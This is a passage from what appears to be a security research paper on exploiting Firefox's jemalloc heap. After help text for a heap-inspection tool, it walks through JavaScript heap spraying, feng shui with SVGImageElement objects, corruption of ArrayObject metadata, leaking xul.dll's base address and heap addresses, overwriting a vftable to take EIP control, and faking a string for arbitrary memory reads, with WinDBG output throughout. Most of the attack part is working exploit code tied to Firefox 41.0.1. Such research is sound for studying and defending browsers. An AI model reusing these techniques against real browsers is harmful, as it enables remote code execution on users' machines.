    [shadow]   jedump [filename]       : dump all available jemalloc info
    [shadow]                                    to screen (default) or file
    [shadow]   jeparse                 : parse jemalloc structures from
    [shadow]                                    memory
    [shadow] Firefox-specific commands:
    [shadow]   nursery                 : display info on the SpiderMonkey
    [shadow]                                    GC nursery
    [shadow]   symbol [-vjdx] <size>   : display all Firefox symbols of the
    [shadow]                                    given size
    [shadow]                                 -v: only class symbols with
    [shadow]                                    vtable
    [shadow]                                 -j: only symbols from
    [shadow]                                    SpiderMonkey
    [shadow]                                 -d: only DOM symbols
    [shadow]                                 -x: only non-SpiderMonkey
    [shadow]                                    symbols
    [shadow]   pa <address> [<length>] : modify the ArrayObject's length
    [shadow]                                    (default new length 0x666)
    [shadow] Generic commands:
    [shadow]   version                 : output version number
    [shadow]   help                    : this help message

You can find the latest version of shadow, along with installation
instructions, in the code archive that comes with this paper and also on
GitHub [SHD]. Just a note; I only had time to test everything on Windows
and WinDBG. Linux/GDB support is almost complete (though no support for the
symbol command). I haven't done any work for supporting OS X/LLDB yet. All
contributions are of course welcome ;)

--[ 5 - Exploitation

In the introduction I set the goal of this paper to be a generic, reusable
exploitation methodology that can be applied to as many as possible Firefox
bugs (and bug classes). To be more specific, this high-level goal can be
broken down into the following:

1) Leak of xul.dll's base address. This DLL is the main one for Firefox and
it contains the code of both SpiderMonkey and Gecko (Firefox's layout
engine). This huge DLL contains all the ROP gadgets you may ever want.

2) Leak of the address in Firefox's heap where we have some control due to
the bug we are exploiting. This can be very useful since we can use it to
create fake objects with valid addresses that point to data we control.

3) The ability to read any number of bytes from any address we choose, i.e.
an arbitrary leak.

4) And finally, of course, EIP control (to start a ROP chain, for example).

In order to achieve these we will be using standard JavaScript arrays, i.e.
ArrayObject jsobjects, as primitives. In the past, researchers have used
typed arrays for similar purposes [P2O, REN]. However, as we have seen in
section 2.1, the user-controllable content (data) of typed arrays and their
metadata (like their length and their data pointer) are no longer
contiguous in memory. On the other hand, I have found that ArrayObjects can
be forced to place their metadata next to their data on the jemalloc heap
and have the following helpful characteristics:

1) We can control their size to multiples of 8 bytes, and also have
partial control of their contents, both due to the IEEE-754 64-bit jsval
representation we have seen.

2) We can easily and controllably spray with ArrayObjects from JavaScript.

3) We can move the sprayed ArrayObjects to the jemalloc-managed heap after
we fill the nursery. Since arrays are jsobjects, when they grow bigger they
behave according to the way I have already described in section 2.3.

----[ 5.1 - ArrayObjects inside ArrayObjects

Therefore, we spray ArrayObjects as elements of a container ArrayObject;
when the container becomes large enough, the elements (which are
themselves ArrayObjects) are moved to the jemalloc heap and bring with them
their contents and metadata. At js/src/gc/Marking.cpp we can see this in
the method js::TenuringTracer::moveElementsToTenured() -- excuse the
annotated with comments pseudocode, see the actual source for the full
details:

/*
 * nslots here is equal to the capacity of the ArrayObject plus 2
 * (ObjectElements::VALUES_PER_HEADER).
 */
size_t nslots = ObjectElements::VALUES_PER_HEADER + srcHeader->capacity;

...

if (src->is<ArrayObject>() && nslots <= GetGCKindSlots(dstKind)) {
  /*
   * If this is an ArrayObject and nslots is less or equal
   * to 16 (GetGCKindSlots(dstKind)) there is no new allocation.
   */

   ...

   return nslots * sizeof(HeapSlot);
}

...

/*
 * Otherwise there is a new allocation of size nslots that
 * goes on the jemalloc heap, the elements are copied, and the
 * elements_ pointer is set.
 */
 dstHeader = \
 reinterpret_cast<ObjectElements*>(zone->pod_malloc<HeapSlot>(nslots));

js_memcpy(dstHeader, srcHeader, nslots * sizeof(HeapSlot));
nursery().setElementsForwardingPointer(srcHeader, dstHeader, nslots);

Let's revisit again the example from section 2.3 and present it in the
context of moving ArrayObjects and their metadata to the jemalloc heap.

...........................................................................
 +-+            +-++-------+             +-----+        :
 |T| Temporary  |A|| elems | ArrayObject |     | Free   :        jemalloc
 | | object     | ||       |  + elements |     | memory :     +-----------+
 +-+            +-++-------+             +-----+        :     | +-------+ |
....................................................... :     | | elems | |
                                                        :     | |       | |
                                        Before minor GC :     | +-------+ |
                                        --------------- :     |    ^  ^   |
  var A = new Array();                                  :     |    |  |   |
    +----+                                              :     |    |  |   |
         |  var A[1] = new Array(); // a                :     |    |  |   |
         |  +                                     +----------------+  |   |
Next free|  |  ... var A[15] = new Array(); // b  |     :     |       |   |
   +---+ |  |          +                          |     :     |       |   |
       | |  |          |    +---------------------+     :     |       |   |
       v v  v          v    |                           :     |       |   |
 +-----------------------+  | +-----------------------+ :     |       |   |
 |+-++-++-++-+         +-+  | |+-++-+                 | :     |       |   |
 ||T||T||A||a|   ...   |b|+-+ ||J||J|                 | :     |       |   |
 || || || || |  elems  | |    || || |                 | :     |       |   |
 |+-++-++-++-+         +-+    |+-++-+                 | :     |       |   |
 +-----------------------+    +-----------------------+ :     |       |   |
  Nursery               +      Tenured                  :     |       |   |
                        |                               :     |       |   |
                        |                               :     |       |   |
                        +------------+                  :     |       |   |
                                     |                  :     |       |   |
.....................................|................. :     |       |   |
                                     |                  :     |       |   |
  Next free                          |  After minor GC  :     |       |   |
  +-----+                            |  --------------  :     +-------|---+
  |                                  |                  :             |
  v                                  v                  :             |
 +-----------------------+   +-----------------------+  :             |
 |                       |   |+-++-++-+              |  :             |
 |                       |   ||J||J||A|+------------------------------+
 |                       |   || || || |              |  : elements_ pointer
 |                       |   |+-++-++-+              |  :
 +-----------------------+   +-----------------------+  :
  Nursery                     Tenured                   :
...........................................................................

The above diagram describes what happens to the Firefox heaps when we run
the following JavaScript code. We create a container ArrayObject; this is
initially allocated on the nursery. This is A from above.

    var container = new Array();

As we add elements (ArrayObjects) to the container, a minor (nursery)
garbage collection happens. We trigger this by filling the 16 MBs of the
nursery with 66000 ArrayObjects of 30 elements each -- remember each
element is 8 bytes (jsval), but the resulting ArrayObject of size 240 goes
to the 256-sized jemalloc run (there are also the metadata).
    
    // 16777216 / 256 == 65536
    var spray_size = 66000;

The container ArrayObject (A) is moved from the nursery to the tenured
heap. If (2 + capacity) >= 17, then each one of the ArrayObject elements of
the container are re-allocated on the jemalloc heap. Since these are
ArrayObjects, they have both contents and some metadata. The container
remains on the tenured heap for the rest of its lifetime.

    for(var i = 0; i < spray_size; i++)
    {
        container[i] = new Array();

        for(var j = 0; j < 30; j += 2) // 30 * 8 == 240
        {
            container[i][j]     = 0x45464645;
            container[i][j + 1] = 0x47484847;
        }
    }

The careful reader would notice something here. The condition to move an
object to the jemalloc heap depends on the object's capacity. This sets a
limit to which jemalloc size categories can be used for our purpose, based
on the object's initial capacity. If you dig SpiderMonkey's code you will
find that an ArrayObject with an initlen of 1 (a[0] = "A" for example) has
a capacity of 6. Therefore, to satisfy the moving condition we have to
preclude some of the small jemalloc size categories.

At this point let's use the shadow utility from within WinDBG to search the
jemalloc heap for the content we have sprayed (edited for readability):

    0:000> !py c:\\tmp\\pykd_driver jesearch -s 256 -c 45464645

    [shadow] searching all current runs of size class 256 for 45464645
    
    [shadow] found 45464645 at 0x141ad110
                    (run 0x141ad000, region 0x141ad100, region size 0256)
    
    [shadow] found 45464645 at 0x141ad120
                    (run 0x141ad000, region 0x141ad100, region size 0256)
    
    [shadow] found 45464645 at 0x141ad130
                    (run 0x141ad000, region 0x141ad100, region size 0256)

    0:000> dd 141ad100 l?80

    [ Metadata of a sprayed ArrayObject ]
              flags    initlen  capacity length
    141ad100  00000000 0000001e 0000001e 0000001e

    [ Contents of the same sprayed ArrayObject ]
    141ad110  45464645 ffffff81 47484847 ffffff81
    141ad120  45464645 ffffff81 47484847 ffffff81
    ...
    141ad1e0  45464645 ffffff81 47484847 ffffff81
    141ad1f0  45464645 ffffff81 47484847 ffffff81

    [ Metadata of another sprayed ArrayObject]
              flags    initlen  capacity length
    141ad200  00000000 0000001e 0000001e 0000001e

    [ and its data ]
    141ad210  45464645 ffffff81 47484847 ffffff81
    141ad220  45464645 ffffff81 47484847 ffffff81

    0:000> !py c:\\tmp\\pykd_driver jeinfo 141ad200
    [shadow] address 0x141ad200
    ...
    [shadow] run 0x141ad000 is the current run of bin 0x00600608

    [shadow] address 0x141ad200 belongs
                    to region 0x141ad200 (size class 0256)

We can see above that the ArrayObject elements of the container ArrayObject
are indeed on the jemalloc heap and specifically on regions of size 256.
Also, they are contiguous to each other.

----[ 5.2 - jemalloc feng shui

Heap feng shui refers to the manipulation of a heap with the goal of
carefully arranging it (with selected objects) towards aiding exploitation
[FSJ]. Armed with the knowledge of the previous sections, we can now:

1) Move our ArrayObjects off the nursery and onto the jemalloc heap along
with their metadata.

2) Poke holes in the jemalloc runs, and trigger a garbage collection to
actually make these holes reclaimable by subsequent allocations.

3) Reclaim the holes (since jemalloc is LIFO) and create useful heap
arrangements.

Assuming we have a heap overflow vulnerability in a specific-sized DOM
class, we can continue towards implementing our methodology. As an
example, I will use a typical Firefox DOM class that has a vtable and can
be allocated easily from JavaScript. Using shadow we can look for such a
DOM class whose objects have a size of 256 bytes:

    0:000> !py c:\\tmp\\pykd_driver symbol
    [shadow] usage: symbol [-vjdx] <size>
    [shadow] options:
    [shadow]    -v  only class symbols with vtable
    [shadow]    -j  only symbols from SpiderMonkey
    [shadow]    -d  only DOM symbols
    [shadow]    -x  only non-SpiderMonkey symbols

    0:000> !py c:\\tmp\\pykd_driver symbol -dv 256
    [shadow] searching for DOM class symbols of size 256 with vtable
    ...
    [shadow] 0x100 (256) class mozilla::dom::SVGImageElement (vtable: yes)

Continuing from where we left off in section 5.1, after spraying the
jemalloc heap with ArrayObjects, we free every second allocation to create
holes. We also trigger a garbage collection to make these holes
reclaimable.

    for(var i = 0; i < spray_size; i += 2)
    {
        delete(container[i]);
        container[i] = null;
        container[i] = undefined;
    }

    var gc_ret = trigger_gc();

We fill these holes with the example vulnerable object we have identified
above, i.e. mozilla::dom::SVGImageElement. Our assumption is that we have
a controlled (or semi-controlled) heap overflow in some method of this
class. We can trigger it either after the instantiation of each object, or
after the allocation of all objects on a specific one.

    for(var i = 0; i < spray_size; i += 2)
    {
        // SVGImageElement is a 0x100-sized object
        container[i] = \
        document.createElementNS("http://www.w3.org/2000/svg", "image");

        // trigger the overflow bug here in all allocations, e.g.:
        // container[i].some_vulnerable_method();
    }

    // or, trigger the overflow bug here in a specific one, e.g.:
    // container[1666].some_vulnerable_method();

Using shadow as before we can search for the controlled sprayed content of
the ArrayObjects and make sure that our heap arrangement has succeeded;
that is we have ArrayObjects and SVGImageElement objects one after the
other contiguously on the jemalloc heap. The jerun command outputs a
textual visualization of the regions of the requested run; their index,
whether allocated (used) or not, address, and a 4-byte preview of the
content. 

    0:000> !py c:\\tmp\\pykd_driver jerun 0x15b11000
    [shadow] searching for run 0x15b11000

    [shadow] [run 0x15b11000] [size 016384] [bin 0x00600608]
                [region size 0256] [total regions 0063] [free regions 0000]

    [shadow] [region 000] [used] [0x15b11100] [0x0]
    [shadow] [region 001] [used] [0x15b11200] [0x69e0cf70]
    [shadow] [region 002] [used] [0x15b11300] [0x0]
    [shadow] [region 003] [used] [0x15b11400] [0x69e0cf70]
    ...

Above we can see that the region at 15b11100 is the first region of the
run, that it is allocated (used), and that its first 4 bytes are zero,
corresponding to the flags of the ArrayObject. The next region at 15b11200
has a first dword of 69e0cf70, which is SVGImageElement's vftable pointer.

Let's examine in more detail:

    0:000> dd 15b11100 l?80

    [ Metadata of ArrayObject at region 000 ]
              flags    initlen  capacity length
    15b11100  00000000 0000001e 0000001e 0000001e

    [ Contents of the ArrayObject ]
    15b11110  45464645 ffffff81 47484847 ffffff81
    15b11120  45464645 ffffff81 47484847 ffffff81
    ...
    15b111d0  45464645 ffffff81 47484847 ffffff81
    15b111e0  45464645 ffffff81 47484847 ffffff81
    15b111f0  45464645 ffffff81 47484847 ffffff81

    [ SVGImageElement object at region 001 ]
    15b11200  69e0cf70 69e0eba0 1a590ea0 00000000
    15b11210  11bfc830 00000000 00020008 00000000
    15b11220  00000000 00000000 15b11200 00000000
    15b11230  00000007 00000000 00090000 00000000
    15b11240  69e0d1f4 00000000 00000000 00000000
    15b11250  00000000 00000000 69e0bd38 00000000
    ...

    [ The next ArrayObject starts here, region 002]
              flags    initlen  capacity length
    15b11300  00000000 0000001e 0000001e 0000001e
    15b11310  45464645 ffffff81 47484847 ffffff81
    15b11320  45464645 ffffff81 47484847 ffffff81
    ...

    [ The SVGImageElement object at region 003 ]
    15b11400  69e0cf70 69e0eba0 1a590ea0 00000000
    ...

    0:000> dds 15b11200  
    15b11200  69e0cf70 xul!mozilla::dom::SVGImageElement::`vftable'

We have indeed managed to arrange the heap the way we wanted. The next
step is to search for the ArrayObject whose metadata we have corrupted via
the assumed SVGImageElement overflow bug. The following code snippet
assumes that we have overwritten all the metadata (16 bytes) and have used
0x666 as the new value for initlen, capacity and length.

    var pwned_index = 0;

    for(var i = 0; i < spray_size; i += 2)
    {
        if(container[i].length > 500)
        {
            var pwnstr = "[*] corrupted array found at index: " + i;
            log(pwnstr);

            pwned_index = i;
            break;
        }
    }

Our corrupted ArrayObject now allows us to index the corresponding
JavaScript array beyond its end, and into the neighboring SVGImageElement
object. Since we have sprayed arrays of length 30 (0x1e), we can index into
the first 8 bytes of the SVGImageElement object as a jsval of type double
at index 30 (since at index 29 is the last element of the array).

    0:000> dd 15b11300 l?80

    [ Corrupted metadata of an ArrayObject ]
              flags    initlen  capacity length
    15b11300  00000000 00000666 00000666 00000666

              [    index 0    ] [   index 1     ]
    15b11310  45464645 ffffff81 47484847 ffffff81

              [    index 2    ] [   index 3     ]
    15b11320  45464645 ffffff81 47484847 ffffff81
    ...
    15b113c0  45464645 ffffff81 47484847 ffffff81
    15b113e0  45464645 ffffff81 47484847 ffffff81

              [    index 28   ] [   index 29    ]
    15b113f0  45464645 ffffff81 47484847 ffffff81

              [    index 30   ] [   index 31    ]
    15b11400  69e0cf70 69e0eba0 1a590ea0 00000000

    15b11410  11bfc830 00000000 00020008 00000000

                                [   index 35    ]
    15b11420  00000000 00000000 15b11400 00000000
    15b11430  00000007 00000000 00090000 00000000
    ...
    15b114e0  e4000201 00000000 00000000 e4010301
    15b114f0  06000106 00000001 00000000 e5e50000

    0:000> g
    [*] corrupted array found at index: 31147

----[ 5.3 - xul.dll base leak and our location in memory

We can read from index 30 above, but remember that because we are using an
array to do so, the two 32-bit values there are going to be treated as a
double jsval (since the one 32-bit value that corresponds to the type of
the 64-bit jsval is less than 0xFFFFFF80). Therefore, we need to implement
two helper functions; one to read the 64-bit value as a double and convert
it to the corresponding raw bytes (named double_to_bytes()), and one to
convert the raw bytes to their hexadecimal representation (named
bytes_to_hex()). Reading from index 30 gives us a vftable pointer of
SVGImageElement and we simply need to subtract from it the known non-ASLRed
pointer from xul.dll.

    var val_hex = \
        bytes_to_hex(double_to_bytes(container[pwned_index][30]));

    var known_xul_addr = 0x121deba0; // 41.0.1 specific
    var leaked_xul_addr = parseInt(val_hex[1], 16);
    var aslr_offset = leaked_xul_addr - known_xul_addr;
    var xul_base = 0x10000000 + aslr_offset;

    var val_str = \
        "[*] leaked xul.dll base address: 0x" + xul_base.toString(16);

    log(val_str);

In the SVGImageElement object at address 15b11428 above, indexed with our
corrupted array at index 35, there is a pointer to the start of the object
itself (15b11400). Such pointers exist in most (if not all, I haven't
checked them all automatically) Firefox DOM objects for garbage collection
purposes. By leaking this address from index 35 of our corrupted array, we
can learn the location of all these objects in the jemalloc heap. This can
be very helpful for creating fake but valid objects (as we will doing in
the sections below).

    val_hex = \
        bytes_to_hex(double_to_bytes(container[pwned_index][35]));

    val_str = "[*] victim SVGImageElement object is at: 0x" + val_hex[0];
    log(val_str);

Again we use the two helper functions for reading double jsvals and
converting them to hexadecimal.

In WinDBG the output is (edited for readability):

    0:000> g
    [*] corrupted array found at index: 31147
    [*] leaked xul.dll base address: 0x67c30000
    [*] victim SVGImageElement object is at: 0x15b11400

    Breakpoint 0 hit
    
    eax=002cf801 ebx=1160b8b0 ecx=00000001 edx=00000002 esi=697f1386
    edi=00000000 eip=697f1386 esp=0038cce0 ebp=0038cd6c iopl=0
    nv up ei pl nz na po nc
    cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b efl=00000202
    
    xul!js::math_asin:
    697f1386 push    ebp

    0:000> lm m xul
    start    end        module name
    67c30000 6a162000   xul        

Indeed we can verify with WinDBG's lm command that we have leaked the base
of xul.dll correctly. Also we now know the address of our victim
SVGImageElement object. The complete code for this is in file
'svg-leak.html' in the archive.

----[ 5.4 - EIP control

Our corrupted ArrayObject can of course also be used for writing memory. In
order to get EIP control, we can simply overwrite a vftable pointer of the
SVGImageElement object and then call one of its methods. The exact values
we have to add to or subtract from the leaked SVGImageElement object
address depend on the method we are calling (and the version of xul.dll).

    var obj_addr = \
        parseInt(val_hex[0], 16); // our location in memory, see above

    var deref_addr = obj_addr - 0x1f4 + 0x4; // 41.0.1 specific
    var target_eip = "41424344";

    var write_val_bytes = \
        hex_to_bytes(target_eip + deref_addr.toString(16));

    var write_val_double = bytes_to_double(write_val_bytes);
    container[pwned_index][30] = write_val_double;

    log("[*] calling a method of the corrupted SVGImageElement object");

    for(var i = 0; i < spray_size; i += 2)
    {
        container[i].setAttribute("height", "100");
    }

Since we don't know the exact index of SVGImageElement object we have
corrupted, we call a method of all the objects we have sprayed.

After we have overwritten SVGImageElement's vftable, in WinDBG the
situation looks like the following:

    0:000> dd 15b11300 l?80

    [ Corrupted metadata of an ArrayObject ]
              flags    initlen  capacity length
    15b11300  00000000 00000666 00000666 00000666

              [    index 0    ] [   index 1     ]
    15b11310  45464645 ffffff81 47484847 ffffff81

              [    index 2    ] [   index 3     ]
    15b11320  45464645 ffffff81 47484847 ffffff81
    ...
    15b113c0  45464645 ffffff81 47484847 ffffff81
    15b113e0  45464645 ffffff81 47484847 ffffff81

              [    index 28   ] [   index 29    ]
    15b113f0  45464645 ffffff81 47484847 ffffff81

              [    index 30   ] [   index 31    ]
    15b11400  15b11210 41424344 1a590ea0 00000000

    15b11410  11bfc830 00000000 00020008 00000000

                                [   index 35    ]
    15b11420  00000000 00000000 15b11400 00000000
    15b11430  00000007 00000000 00090000 00000000
    ...
    15b114e0  e4000201 00000000 00000000 e4010301
    15b114f0  06000106 00000001 00000000 e5e50000

    0:000> g
    [*] calling a method of the corrupted SVGImageElement object

    (1084.a60): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    
    eax=15b11210 ebx=00000001 ecx=15b11400 edx=00000006 esi=1160b8b0
    edi=15b11400 eip=41424344 esp=0032d2f0 ebp=0032d520 iopl=0
    nv up ei pl zr na pe nc
    cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b  efl=00010246
    
    41424344 je  41424346                                         [br=1]

We have EIP control, know the base of xul.dll, and can place arbitrary
content on the heap at known addresses, therefore it is quite simple at
this point to ROP our way to whatever makes us happy. See the file
'svg-eip-control.html' for the complete code.

----[ 5.5 - Arbitrary memory leak

Although we have achieved total control over the Firefox process, let's
look at something that requires more fine-grained control over the jemalloc
heap. To demonstrate how jemalloc can be manipulated in detail, I will be
describing how we can achieve the ability to read any number of bytes from
any address we choose, i.e. an arbitrary memory leak.

For this purpose I will be using a constructed (i.e. fake) non-inline
string. In order to be able to read back from this fake string, I will
also need to create a fake string-type jsval that points to the fake
non-inline string, and index this jsval via the corrupted ArrayObject. The
problem with this approach is that the corrupted ArrayObject cannot be used
to write a fake string-type jsval (or any other jsval); remember that
there is no IEEE-754 64-bit double that corresponds to a 32-bit encoded
value greater than 0xFFF00000. This is required since in order to create a
fake jsval string we need to write ffffff85 as its tag value (see the
discussion on strings in section 2.1 if you are confused at this point).

So, we need to find another way to construct a fake string-type jsval in
controlled memory. What we can use is the reliability and the LIFO
operation of jemalloc to create a more complex heap arrangement that will
help us solve this problem. Specifically, I will add typed arrays to the
methodology to utilize their fully controlled content. Although, as we have
seen, I cannot place the metadata of a typed array in memory reachable by
user-controlled data, the actual data of a typed array (which are
controlled to byte granularity) can be placed on jemalloc runs.

We start by spraying with ArrayObjects the 256-sized jemalloc runs. Again,
we have to bypass the nursery and move our objects to jemalloc, so the
size of our spray is 16777216 / 256 == 65536 arrays.

    var spray_size = 66000;
    var container = new Array();

    for(var i = 0; i < spray_size; i++)
    {
        container[i] = new Array();

        for(var j = 0; j < 30; j += 2) // 30 * 8 == 240 bytes
        {
            container[i][j]     = 0x45464645;
            container[i][j + 1] = 0x47484847;
        }
    }

This time, instead of creating a hole every other allocation, we create two
holes for every ArrayObject we leave on the jemalloc heap. We also trigger
a GC to make the holes reclaimable.

    for(var i = 0; i < spray_size; i += 3)
    {
        delete(container[i]);
        container[i] = null;
        container[i] = undefined;

        delete(container[i + 1]);
        container[i + 1] = null;
        container[i + 1] = undefined;
    }

    var gc_ret = trigger_gc();

Let's assume at this point that we have a breakpoint and look at how the
jemalloc 256-sized runs look like:

    0:043> !py c:\tmp\pykd_driver jeruns -s 256
    [shadow] listing allocated non-current runs for size class 256
    [shadow] [total non-current runs 446]
    
    [shadow] [run 0x0e507000] [size 016384] [bin 0x00700608]
        [region size 0256] [total regions 0063] [free regions 0000]

    ...

    [shadow] [run 0x11d03000] [size 016384] [bin 0x00700608]
        [region size 0256] [total regions 0063] [free regions 0042]

    [shadow] [run 0x15f09000] [size 016384] [bin 0x00700608]
        [region size 0256] [total regions 0063] [free regions 0042]

    [shadow] [run 0x15f0d000] [size 016384] [bin 0x00700608]
        [region size 0256] [total regions 0063] [free regions 0042]

    [shadow] [run 0x15f11000] [size 016384] [bin 0x00700608]
        [region size 0256] [total regions 0063] [free regions 0042]

    [shadow] [run 0x15f15000] [size 016384] [bin 0x00700608]
        [region size 0256] [total regions 0063] [free regions 0042]

    [shadow] [run 0x15f19000] [size 016384] [bin 0x00700608]
        [region size 0256] [total regions 0063] [free regions 0042]

    ...

Looking at one of these runs (in random) with shadow we see:

    0:000> !py c:\tmp\pykd_driver jerun 0x15f15000
    [shadow] searching for run 0x15f15000
    
    [shadow] [run 0x15f15000] [size 016384] [bin 0x00700608]
        [region size 0256] [total regions 0063] [free regions 0042]

    [shadow] [region 000] [free] [0x15f15100] [0xe5e5e5e5]
    [shadow] [region 001] [free] [0x15f15200] [0xe5e5e5e5]
    [shadow] [region 002] [used] [0x15f15300] [0x0]
    [shadow] [region 003] [free] [0x15f15400] [0xe5e5e5e5]
    [shadow] [region 004] [free] [0x15f15500] [0xe5e5e5e5]
    [shadow] [region 005] [used] [0x15f15600] [0x0]
    [shadow] [region 006] [free] [0x15f15700] [0xe5e5e5e5]
    [shadow] [region 007] [free] [0x15f15800] [0xe5e5e5e5]
    [shadow] [region 008] [used] [0x15f15900] [0x0]
    [shadow] [region 009] [free] [0x15f15a00] [0xe5e5e5e5]
    [shadow] [region 010] [free] [0x15f15b00] [0xe5e5e5e5]
    ...

Our hole punching has worked. Remember that e5e5e5e5 is the value used by
Firefox for the sanitization of freed jemalloc regions. The used regions
with the value 0x0 as their first dword are the ArrayObjects we have left
on the heap.

We now reclaim these holes on the jemalloc heap with one SVGImageElement
object and one Uint32Array typed array after each ArrayObject. We make
sure the content of this typed array is of size 256 bytes so it goes on
the jemalloc run we are targeting. At this point the actual content of the
typed array doesn't matter.

    for(var i = 0; i < spray_size; i += 3)
    {
        container[i] = \
        document.createElementNS("http://www.w3.org/2000/svg", "image");

        container[i + 1] = new Uint32Array(64);

        for(var j = 0; j < 64; j++) // 64 * 4 == 256
        {
            container[i + 1][j] = 0x51575751;
        }
    }

Now, the same run from above looks like:

    0:000> !py c:\tmp\pykd_driver jerun 0x15f15000
    [shadow] searching for run 0x15f15000
    
    [shadow] [run 0x15f15000] [size 016384] [bin 0x00700608]
        [region size 0256] [total regions 0063] [free regions 0000]

    [shadow] [region 000] [used] [0x15f15100] [0x69e0cf70]
    [shadow] [region 001] [used] [0x15f15200] [0x51575751]
    [shadow] [region 002] [used] [0x15f15300] [0x0]
    [shadow] [region 003] [used] [0x15f15400] [0x69e0cf70]
    [shadow] [region 004] [used] [0x15f15500] [0x51575751]
    [shadow] [region 005] [used] [0x15f15600] [0x0]
    [shadow] [region 006] [used] [0x15f15700] [0x69e0cf70]
    [shadow] [region 007] [used] [0x15f15800] [0x51575751]
    [shadow] [region 008] [used] [0x15f15900] [0x0]
    [shadow] [region 009] [used] [0x15f15a00] [0x69e0cf70]
    [shadow] [region 010] [used] [0x15f15b00] [0x51575751]
    ...
    [shadow] [region 014] [used] [0x15f15f00] [0x0]
    [shadow] [region 015] [used] [0x15f16000] [0x69e0cf70]
    [shadow] [region 016] [used] [0x15f16100] [0x51575751]

    0:000> dd 0x15f15f00 l?90

    [ ArrayObject ]
    15f15f00  00000000 0000001e 0000001e 0000001e
    15f15f10  45464645 ffffff81 47484847 ffffff81
    15f15f20  45464645 ffffff81 47484847 ffffff81
    15f15f30  45464645 ffffff81 47484847 ffffff81
    15f15f40  45464645 ffffff81 47484847 ffffff81
    15f15f50  45464645 ffffff81 47484847 ffffff81
    15f15f60  45464645 ffffff81 47484847 ffffff81
    15f15f70  45464645 ffffff81 47484847 ffffff81
    15f15f80  45464645 ffffff81 47484847 ffffff81
    15f15f90  45464645 ffffff81 47484847 ffffff81
    15f15fa0  45464645 ffffff81 47484847 ffffff81
    15f15fb0  45464645 ffffff81 47484847 ffffff81
    15f15fc0  45464645 ffffff81 47484847 ffffff81
    15f15fd0  45464645 ffffff81 47484847 ffffff81
    15f15fe0  45464645 ffffff81 47484847 ffffff81
    15f15ff0  45464645 ffffff81 47484847 ffffff81

    [ SVGImageElement ]
    15f16000  69e0cf70 69e0eba0 1652da20 00000000
    15f16010  0d863c90 00000000 00020008 00000000
    15f16020  00000000 00000000 15f16000 00000000
    15f16030  00000007 00000000 00090000 00000000
    15f16040  69e0d1f4 00000000 00000000 00000000
    15f16050  00000000 00000000 69e0bd38 00000000
    15f16060  69f680d4 e5e50000 69f680d4 e5e50000
    15f16070  69f680d4 e5e50100 00000000 e5e5e5e5
    15f16080  69e0c9d8 69e0c24c 00000000 00000000
    15f16090  00000000 00000000 00000000 00000000
    15f160a0  00000000 e5e5e5e5 00000000 00000000
    15f160b0  00890001 e5000000 00000000 e5e5e5e5
    15f160c0  00000000 00000000 e4000001 00000000
    15f160d0  00000000 e4010101 00000000 00000000
    15f160e0  e4000201 00000000 00000000 e4010301
    15f160f0  06000106 00000001 00000000 e5e50000

    [ Uint32Array contents ]
    15f16100  51575751 51575751 51575751 51575751
    15f16110  51575751 51575751 51575751 51575751
    15f16120  51575751 51575751 51575751 51575751
    15f16130  51575751 51575751 51575751 51575751
    ...

We have managed to create the arrangement we require; we have one
ArrayObject (with its metadata and jsval contents), followed by an
SVGImageElement object, followed by the contents of a Uint32Array. If we
look at some other runs (of our targeted size, 256) we may see that in some
of them the arrangement has not succeeded. That is the ArrayObject is
followed by a Uint32Array, which is then followed by an SVGImageElement
object. This happens sometimes, but it doesn't really affect us. As long
as there is one run on which our arrangement has worked, our methodology
can be applied. Below I will explain why some runs with incorrect
arrangement do not pose a problem; just keep it in mind in case you have
seen it with shadow and you are wondering.

Next we proceed with triggering our assumed heap overflow bug in an
SVGImageElement method. This allows us to overwrite data from the
SVGImageElement object onto the ArrayObject we placed after it (and of
course the in-between Uint32Array in this case). We then locate the pwned
ArrayObject as we did in section 5.2, and use it to leak our location in
memory as we did in 5.3 (see file 'arbitrary-leak.html' in the archive for
the complete code). We can now focus on transforming our relative leak to
an arbitrary leak.

Since we know the address of the SVGImageElement object, we can calculate
the address of the neighboring Uint32Array; it is 0x100 bytes after it. We
can then create our fake string-type jsval at the beginning of every
Uint32Array we have sprayed. This fake jsval will point 0x10 bytes after
the start of the Uint32Array. There we will create a fake non-inline string
with the arbitrary address we want to leak from. The JavaScript code for
all these is the following:

    // this is the leaked address of the SVGImageElement object
    var obj_addr = parseInt(val_hex[0], 16);

    // where we will place our fake non-inline string
    var fake_jsstring_addr = obj_addr + 0x110;

    // create a fake string-type jsval at the start
    // of each sprayed Uint32Array object
    for(var i = 0; i < spray_size; i += 3)
    {
        container[i + 1][0] = fake_jsstring_addr;
        container[i + 1][1] = 0xffffff85;
    }

    // at obj_addr + 0x110, which corresponds to [64] and [65],
    // we create a fake non-inline string
    var read_len = "00000002"; // fake string size
    write_val_bytes = hex_to_bytes(read_len + "00000049");
    write_val_double = bytes_to_double(write_val_bytes);
    container[pwned_index][64] = write_val_double;

    // we use the base of xul.dll as the arbitrary address to
    // read from, since we know that the first two bytes there
    // are "MZ" in ASCII
    var read_addr = xul_base.toString(16);
    write_val_bytes = hex_to_bytes("00000000" + read_addr);
    write_val_double = bytes_to_double(write_val_bytes);
    container[pwned_index][65] = write_val_double;

    // let's read from our fake string, it is at index [62]
    var leaked = "[*] leaked: " + container[pwned_index][62];
    log(leaked);

The actual objects in memory after the execution of the above code are:

    0:000> dd 0x15f15f00 l?90

    [ Our corrupted ArrayObject ]
    15f15f00  00000000 00000666 00000666 00000666
    15f15f10  45464645 ffffff81 47484847 ffffff81
    15f15f20  45464645 ffffff81 47484847 ffffff81
    15f15f30  45464645 ffffff81 47484847 ffffff81
    15f15f40  45464645 ffffff81 47484847 ffffff81
    15f15f50  45464645 ffffff81 47484847 ffffff81
    15f15f60  45464645 ffffff81 47484847 ffffff81
    15f15f70  45464645 ffffff81 47484847 ffffff81
    15f15f80  45464645 ffffff81 47484847 ffffff81
    15f15f90  45464645 ffffff81 47484847 ffffff81
    15f15fa0  45464645 ffffff81 47484847 ffffff81
    15f15fb0  45464645 ffffff81 47484847 ffffff81
    15f15fc0  45464645 ffffff81 47484847 ffffff81
    15f15fd0  45464645 ffffff81 47484847 ffffff81
    15f15fe0  45464645 ffffff81 47484847 ffffff81
    15f15ff0  45464645 ffffff81 47484847 ffffff81

    [ Our SVGImageElement object ]
    15f16000  69e0cf70 69e0eba0 1652da20 00000000
    15f16010  0d863c90 00000000 00020008 00000000
